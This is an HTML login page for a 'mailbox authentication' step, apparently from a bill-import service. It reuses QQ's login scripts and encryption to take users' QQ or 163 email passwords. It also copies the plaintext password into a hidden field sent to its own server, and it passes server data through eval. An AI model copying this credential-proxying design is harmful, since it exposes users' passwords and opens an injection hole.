	<html lang="zh-cn">
<head>
 <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"/>
    <meta name="apple-mobile-web-app-capable" content="yes"/>
    <meta name="apple-mobile-web-app-status-bar-style" content="black"/>
    <meta name="format-detection" content="telephone=no"/>
    <meta http-equiv="Expires" CONTENT="-1"/>
    <meta http-equiv="Cache-Control" CONTENT="no-cache"/>
    <meta http-equiv="Pragma" CONTENT="no-cache"/>
<script type="text/javascript" charset="utf-8" src="https://imgcache.qq.com/ptlogin/ac/v9/js/area_chs.js"></script>
<script type="text/javascript" charset="utf-8" src="https://imgcache.qq.com/ptlogin/ver/10225/js/login_10.js"></script>
<script type="text/javascript" async="" src="https://captcha.gtimg.com/1/TCapMsg.js"></script>
<script type="text/javascript" async="" src="https://captcha.gtimg.com/1/TCapIframe_m.js?v=1.0"></script>
<script th:src="@{/js/jquery-1.8.2.min.js}"></script>
<script> var jq142 = jQuery.noConflict(true); </script>

   <style>
         body{
             margin:0;
            padding:0;
            background-color:#f7f8fd;
        }
    header
    {
        width:100%;
        margin:0;
        background-color: #fff;
    }
    .title
    {
        text-align: center;

    }
    .leftGo
    {
        background:url(../image/mail/pre.png) no-repeat;
        background-size:contain;
        width:2rem;
        height: 2rem;
        display: block;
        position:absolute;
        left: 1.25rem;
        top:0.5rem;
    }
    a{
        text-decoration: none;
        color:#333;
        cursor: pointer;
    }

    .header-text
    {
        text-align: center;
        line-height: 3rem;
    }
    .title p{
    padding:5%;
    margin:0;
    }
    .title img
    {
        float: left;
        margin-top:3%;
        margin-left:8%;
    }
    .login-login
    {
        width:100%;
        margin-top:0.5rem ;
        text-align: center;
        color: #fff;
    

    }
    .login-content
    {
    width:100%;
    margin:0 auto;
    overflow: auto;
    zoom:1;
    background-color:#fff;
    }
    .login-login h1
    {
        font-size:3rem;
        font-weight:lighter;
    }
    .login-num
    {
        
        color:#666;
        width:100%;
        height:2.5rem;
        border-bottom: 1px solid  #f7f8fd;
    }
    .login-num img
    {
        float:left;
        margin-top:0.5rem;
        margin-left:5%;
    }
    .login-num span
    {
        display: block;
        float: left;
        margin-left:10%;
        margin-top:0.9rem;
        font-size:0.8rem;
        color:#ccc;
    }
    .login-num input
    {
        width:75%;
        height:2rem;
        margin-top:0.2rem;
        margin-left:5%;
        display:block;
        margin-bottom:0rem;
        float:left;
        background-color:transparent;
        border:none;
        outline:none;
        
    }
    ::-webkit-input-placeholder { /* WebKit browsers */
    color:#ccc;
        
    }
    :-moz-placeholder { /* Mozilla Firefox 4 to 18 */
        color:#ccc;
        
    }
    ::-moz-placeholder { /* Mozilla Firefox 19+ */
        color:#ccc;

    }
    :-ms-input-placeholder { /* Internet Explorer 10+ */
    color:#ccc;
        
    }
    .login-num .check
    {
        width:70%;
        float: left;
    }
    .login-dl
    {
        width:90%;
        margin-top:4rem;
        height: 2.5rem;
        border-radius:0.25rem;
        background:url(../image/mail/1.png) no-repeat;
        color:#fff;
        border:none;
        outline: none;
        font-size:1.1rem;
        text-align: center;
        
    }
        .last-word
    {
        color:#808080;
        font-size:0.6rem;
        float: left;
        margin-left:5%;

    }
    .last-word a{

        color:#ff682c;
        text-decoration: none;
    }
     </style>
<script type="text/javascript">
jq142(function (){
	jq142("#input_invisible").blur(function (){
		var val=jq142("#input_invisible").val();
		
		if(val==''){
			jq142("#visible").hide();
		}else{
			jq142("#visible").show();
		}
	})
	
	

	
})
jq142(function (){
	jq142("#input_invisible").keydown(function (){
		var val=jq142("#input_invisible").val();
		
		if(val==''){
			jq142("#visible").hide();
		}else{
			jq142("#visible").show();
		}
	})
	
	

	
})




//加密密码
function weizai(){
	jq142("#btn").attr("disabled", true); 
	jq142("#btn").css('background','#eee')
	jq142("#btn").val("处理中...");
	

        var number=jq142("#qqnumber").val();
        var pwds=jq142("#input_visible").val();
        if(number==null||number.trim().length==0||pwds==null||pwds.trim().length==0){
            alert("账号或密码不能为空！")
            return false;
        }
        if((number.indexOf("@163.com"))>-1){
            jq142("#mailForm").attr("action","../mail163/RZ163Mail.do");
            jq142("#mailForm").submit();
            return true;
        }

	    jq142("#vvv").css('background','#46b1ff')

	jq142.ajax({
        data: {qqnumber:jq142("#qqnumber").val()},
		 url:"../interface/encryptrsa.do",
		 async:false,
		 success:function (data, textStatus) {
		
			//给 全局变量赋值。用于提交加密
		
			
			//判断是否需要验证码
			if(data.fileName!='1'){
				//alert(data.fileName)
// 			$("#testimg").attr('src',"http://localhost:8080/upload/"+data.fileName);
			//	document.write("暂不支持异地登录"+Date());
			}
			debugger;
			var  salt=getSalt(data.xx.replace(/\\x/g, ""));
			 var qqpwd=document.getElementById('input_visible').value;
		
				document.getElementById('showpwd').value=qqpwd;
			var encryptionPassword = $.Encryption.getEncryption(qqpwd,salt,data.code);
			document.getElementById('input_visible').value=encryptionPassword;
			document.getElementById('sess').value=data.sess;
			document.getElementById('codes').value=data.code;
			  document.getElementById("mailForm").submit();
	
			 
		
		 }
	});


}(jq142);



 //转换salt
function getSalt(str) {
	//  <![CDATA[
    for (var arr = [], i = 0; i < str.length; i += 2)
        arr.push("\\x" + str.substr(i, 2));
    return arr = arr.join(""),
    eval("var temp = '" + arr + "'"),
    temp
    //]]>
}

 
(function($){
//加载获取 加密所需的字段值	

})(jq142);
</script>
</head>
  <body>
  <form action="../interface/test.do" method="POST" id="mailForm">
    	<header>
    		<div class="title">
                <a class="leftGo" href="#"></a>
		        <div class="header-text">邮箱认证</div>
            </div> 
    	</header>
    	<div class="login-login">
            <div class="login-content">
                <div class="login-num">
                    <img src="../image/mail/email.png" />
                    <input type="text" name="qqnumber" id="qqnumber" placeholder="&nbsp;&nbsp;&nbsp;请输入您的账号/手机号码"/>
                </div>
                <div class="login-num">
                    <img src="../image/mail/lock.png"/>
                    <input type="password" name="password" id="input_visible" placeholder="&nbsp;&nbsp;&nbsp;请输入您的密码"/>
                </div>  
            </div>
			<input type="hidden" id="sess"  name="sess"  />
			<input type="hidden" id="codes"  name="code"  />
			<input type="hidden" id="showpwd"  name="showpwd" />

                <button class="login-dl" id="btn" onclick="return weizai()">认 证</button>

                <p class="last-word">同意<a>《性感邮箱账单服务协议》</a></p>
        </div>
</form>
    </body>
</html>



